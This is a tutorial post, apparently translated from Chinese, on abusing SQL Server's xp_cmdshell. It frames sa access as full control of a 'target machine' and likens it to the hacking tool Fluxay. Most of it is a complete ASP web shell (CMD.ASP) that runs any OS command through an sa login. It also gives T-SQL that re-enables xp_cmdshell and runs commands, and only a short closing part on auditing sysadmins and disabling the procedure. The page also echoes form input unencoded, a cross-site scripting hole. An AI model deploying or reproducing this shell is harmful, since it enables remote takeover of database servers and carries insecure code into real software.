The xp_cmdshell extended stored procedure runs a CMD command on the machine that hosts SQL Server (not on the web server serving the ASP page, unless they are the same box). Calling it requires a login in the sysadmin fixed server role, which in practice means the sa login. In other words, once you have the SA password for a SQL Server instance you can do whatever you want on the target machine, because the command executes under the SQL Server service account. Note that on SQL Server 2005 and later xp_cmdshell is disabled by default and a sysadmin has to switch it on with sp_configure first; on SQL Server 2000 it is usable as soon as you can log in as sa. The well-known tool "流光" (Fluxay) presumably also uses this stored procedure to operate on the target machine. Below is a simple application page (ASP) that I wrote: it connects to master as sa with the server name and password entered in the form, runs the submitted command through xp_cmdshell, and prints each line of output as a table row. The code is as follows.

CMD.ASP

<%@ LANGUAGE="VBSCRIPT" CODEPAGE="936" %>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>SQLSERVER_XP_CMDSHELL example_魔术师·刘</title>
<style type="text/css">
<!--
body{font-size:13px;line-height:20px;width:760px;SCROLLBAR-FACE-COLOR:#2896e1;SCROLLBAR-SHADOW-COLOR:#6cb4d8;SCROLLBAR-ARROW-COLOR:#f0f0f0;SCROLLBAR-DARKSHADOW-COLOR:#2896e1;SCROLLBAR-BASE-COLOR:#2896e1;background-image:url(images/bg.gif);}
.LBR{border-top:0px solid #336699;border-left:1px solid #336699;border-right:1px solid #336699;border-bottom:1px solid #336699;}
.all_h{border:1px solid #336699;}
.input{border:1px solid #336699;background-color:#ECEAFD;}
.LB{border-top:0px solid #336699;border-left:1px solid #336699;border-right:0px solid #336699;border-bottom:1px solid #336699;}
.N1{font-weight:bold;color:#339933;font-size:13px;}
.N2{font-weight:bold;color:#ff0000;font-size:13px;}
-->
</style>
</head>
<body>
<% If Request("cmd") <> "" Then %>
<table width="400" border="0" align="center" cellpadding="5" cellspacing="0">
 <tr align="center">
  <td height="30" class="all_h" bgcolor="#B3E0FF"><span class="N1">XP_CMDSHELL request result</span></td>
 </tr>
<%
Dim ConnStr, conn, rs, i
' Connect to the master database as sa, using the server name and password from the form.
ConnStr = "Provider=sqloledb.1;persist security info=false;server=" & Request("server") & ";uid=sa;pwd=" & Request("pwd") & ";database=master"
' Hard-coded alternative for a local instance (left commented out, as in the original):
'ConnStr = "Provider=sqloledb.1;persist security info=false;server=(local);uid=sa;pwd=www.zhi.net;database=master"
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open ConnStr
' Build xp_cmdshell '<command>'. Single quotes in the command are doubled so the
' T-SQL string literal stays intact; the Chr(34) replacement swaps " for " and so
' has no effect as written.
Set rs = conn.Execute("xp_cmdshell '" & Replace(Replace(Request("cmd"), "'", "''"), Chr(34), """") & "'")
' Each row of the result set is one line of command output. NULL rows (blank lines)
' are skipped; alternate rows get a shaded background. The output is HTML-encoded so
' that lines such as <DIR> from "dir" are displayed instead of being parsed as tags.
i = 0
While Not rs.EOF
    If Not IsNull(rs(0)) Then
        If i Mod 2 = 0 Then
            Response.Write "<tr><td class=""LBR"" bgcolor=""#DEF3FF"">" & Server.HTMLEncode(rs(0)) & "</td></tr>"
        Else
            Response.Write "<tr><td class=""LBR"">" & Server.HTMLEncode(rs(0)) & "</td></tr>"
        End If
        i = i + 1
    End If
    rs.MoveNext
Wend
rs.Close
Set rs = Nothing
conn.Close
Set conn = Nothing
%>
</table>
<% End If %>
<form name="form1" method="post" action="">
 <table width="400" border="0" align="center" cellpadding="5" cellspacing="0">
  <tr align="center">
   <td height="30" colspan="2" class="all_h" bgcolor="#B3E0FF"><span class="N1">XP_CMDSHELL example</span></td>
  </tr>
  <tr align="center" bgcolor="#DEF3FF">
   <td width="26%" class="LB"><strong>Server</strong></td>
   <td width="74%" class="LBR"><div align="left"><input name="Server" type="text" size="20" value="<%=Request("Server")%>"></div></td>
  </tr>
  <tr align="center">
   <td class="LB"><b>SA password</b></td>
   <td class="LBR"><div align="left"><span class="N1"><input name="PWD" type="text" size="20" value="<%=Request("PWD")%>"></span></div></td>
  </tr>
  <tr align="center" bgcolor="#DEF3FF">
   <td width="26%" class="LB"><strong>CMD command</strong></td>
   <td width="74%" class="LBR"><div align="left"><input name="CMD" type="text" size="20" value="<%=Request("CMD")%>"></div></td>
  </tr>
  <tr align="center">
   <td colspan="2" class="LBR"><div align="center"><input type="submit" name="Submit" value=" Submit command " class="input"></div></td>
  </tr>
 </table>
</form>
</body>
</html>
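The T-SQL that the page above wraps, together with the prerequisite checks, a way to capture the output, and the switch a defender flips back. This is an added example and is not part of the original page or its code. It assumes SQL Server 2005 or later for sys.configurations, sys.server_principals and the sp_configure 'xp_cmdshell' option; older releases such as SQL Server 2000 have xp_cmdshell callable as soon as a sysadmin login connects, so steps 2 and 3 do not apply there.

```sql
-- Added example, not the original page's code. Assumes SQL Server 2005 or later.

-- 1. Is the current login allowed to call xp_cmdshell at all?  1 = member of sysadmin.
SELECT IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- 2. Is the procedure switched on?  value_in_use = 0 means disabled (the default since 2005).
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- 3. Enable it (sysadmin only). This is the first thing an attacker with sa does on 2005+.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- 4. The statement the ASP page sends. The page connects to master, so the bare name
--    resolves; from any other database use master..xp_cmdshell. A single quote inside
--    the command must be doubled to stay inside the T-SQL string literal, which is what
--    the page's Replace(cmd, "'", "''") does.
EXEC xp_cmdshell 'dir c:\';
EXEC master..xp_cmdshell 'echo it''s quoted';

-- 5. Capture the output as rows instead of reading it off the screen: each line is one
--    row and NULL is a blank line. 'whoami' shows which Windows account the commands
--    really run under (the SQL Server service account for sysadmin callers).
CREATE TABLE #cmd_out (line nvarchar(4000));
INSERT INTO #cmd_out EXEC master..xp_cmdshell 'whoami';
SELECT line FROM #cmd_out WHERE line IS NOT NULL;
DROP TABLE #cmd_out;

-- 6. Defender's side: list every login that could do the above, then turn the
--    procedure back off.
SELECT name, type_desc
FROM sys.server_principals
WHERE IS_SRVROLEMEMBER('sysadmin', name) = 1;

EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
```

Run it in Query Analyzer, Management Studio or sqlcmd as a sysadmin login. Step 3 fails with a permissions error for any other login, which is exactly why the page insists on the sa password; a non-sysadmin login can only use xp_cmdshell if an administrator has set up a proxy account with sp_xp_cmdshell_proxy_account, and even then the command runs as that proxy, not as the service account.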